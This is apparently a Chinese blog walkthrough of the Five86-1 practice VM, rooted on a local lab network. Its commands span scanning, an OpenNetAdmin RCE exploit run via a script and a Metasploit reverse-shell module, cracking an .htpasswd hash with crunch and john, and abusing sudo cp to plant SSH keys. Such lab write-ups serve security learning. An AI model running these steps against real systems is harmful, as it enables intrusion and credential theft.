渗透测试学习之靶机Five86-1

过程
1. 探测目标主机

nmap -sP 192.168.246.0/24,得到目标主机IP:192.168.246.147
渗透测试学习之靶机Five86-1_第1张图片

2. 信息搜集
  • 端口信息
    nmap -sV -p 1-65535 192.168.246.147
    渗透测试学习之靶机Five86-1_第2张图片
    2个http端口,80是Apache,10000那个查一下:
    渗透测试学习之靶机Five86-1_第3张图片
  • web站点相关服务信息
    80Apache下的站点:
    渗透测试学习之靶机Five86-1_第4张图片
    10000端口下的集成环境:
    渗透测试学习之靶机Five86-1_第5张图片
    服务信息看不出啥
  • 目录信息
    直接使用kali里的dirb:
    dirb http://192.168.246.147
    渗透测试学习之靶机Five86-1_第6张图片
    打开robots.txt:
    渗透测试学习之靶机Five86-1_第7张图片
    打开ona:
    渗透测试学习之靶机Five86-1_第8张图片
    搞不懂这是个啥,百度:
    渗透测试学习之靶机Five86-1_第9张图片
    看一下版本:
    渗透测试学习之靶机Five86-1_第10张图片
3. RCEgetshell

kali里搜一下相关漏洞:
searchsploit opennetadmin
在这里插入图片描述
刚刚好对应上了RCE。
进入该目录,然后./47691.sh http://192.168.246.147/ona/login.php
一直报错,中途进去删了空行,没改回原来的样子,大致是这样:
在这里插入图片描述
至于login.php是怎么找到,点击右上角的logout后,出现logout.php,试下login.php就出现登录界面。
去漏洞库找下EXP,看到个msf版的:
渗透测试学习之靶机Five86-1_第11张图片
下载后拉进kali,我放的位置是/usr/share/metasploit-framework/modules/exploits/unix/
渗透测试学习之靶机Five86-1_第12张图片
然后在msf里重新加载,reload_all
在这里插入图片描述
使用该exp:use exploit/unix/47772
查看所需配置:show options
渗透测试学习之靶机Five86-1_第13张图片
设置目标IP,反弹IP:
set rhosts 192.168.246.147
set srvhost 192.168.246.138
set lhost 192.168.246.138
在这里插入图片描述
expolit
渗透测试学习之靶机Five86-1_第14张图片
shell后,获取交互式shell:
python -c 'import pty;pty.spawn("/bin/bash")'
在这里插入图片描述
进入html目录,查看文件:
在这里插入图片描述
渗透测试学习之靶机Five86-1_第15张图片
根据.htaccess里的提示找到.htpasswd:
cd /var/www
ls -la
cat .htpasswd
渗透测试学习之靶机Five86-1_第16张图片
是一个用户的账户密码,提示密码10位数且只有aefhrt这些字符,用crunch生成字典:
crunch 10 10 aefhrt -o /root/Desktop/dic.txt
渗透测试学习之靶机Five86-1_第17张图片
将.htpasswd中的密码保存到文件中,使用生成的字典john爆破一下:
john --wordlist=/root/Desktop/dic.txt /root/Desktop/86-1.txt
渗透测试学习之靶机Five86-1_第18张图片
得到密码:fatherrrrr
切换到douglas用户,然后查看权限:
渗透测试学习之靶机Five86-1_第19张图片
/bin/cp也就是copy命令可以使用Jen用户权限免密执行,在douglas下,看到隐藏的.ssh,那么把它cp到jen目录下就可以使用ssh密钥登录jen了:
渗透测试学习之靶机Five86-1_第20张图片
Linux密钥登录原理和ssh使用密钥实现免密码登陆
将公钥复制到jen里:
cp id_rsa.pub /tmp/authorized_keys
chmod 777 /tmp/authorized_keys
sudo -u jen /bin/cp /tmp/authorized_keys /home/jen/.ssh
渗透测试学习之靶机Five86-1_第21张图片
登录:
ssh [email protected]
渗透测试学习之靶机Five86-1_第22张图片
登录上就提示You have new mail.
查看
cd /var/mail
ls
cat jen
看到一篇挺长的邮件:
渗透测试学习之靶机Five86-1_第23张图片
重点在这里:
渗透测试学习之靶机Five86-1_第24张图片
moss的密码是Fire!Fire!
切换用户:
cd
ls -la
来到moss的目录下看到隐藏的games:
渗透测试学习之靶机Five86-1_第25张图片
进入该目录后查看文件,有个root:
渗透测试学习之靶机Five86-1_第26张图片
打开看后是乱码,然后执行一下就蹦出了这个:
渗透测试学习之靶机Five86-1_第27张图片
直接进入root目录,找到flag.txt:
渗透测试学习之靶机Five86-1_第28张图片

总结
  • 扩展起来挺多东西的。

你可能感兴趣的:(靶机,安全)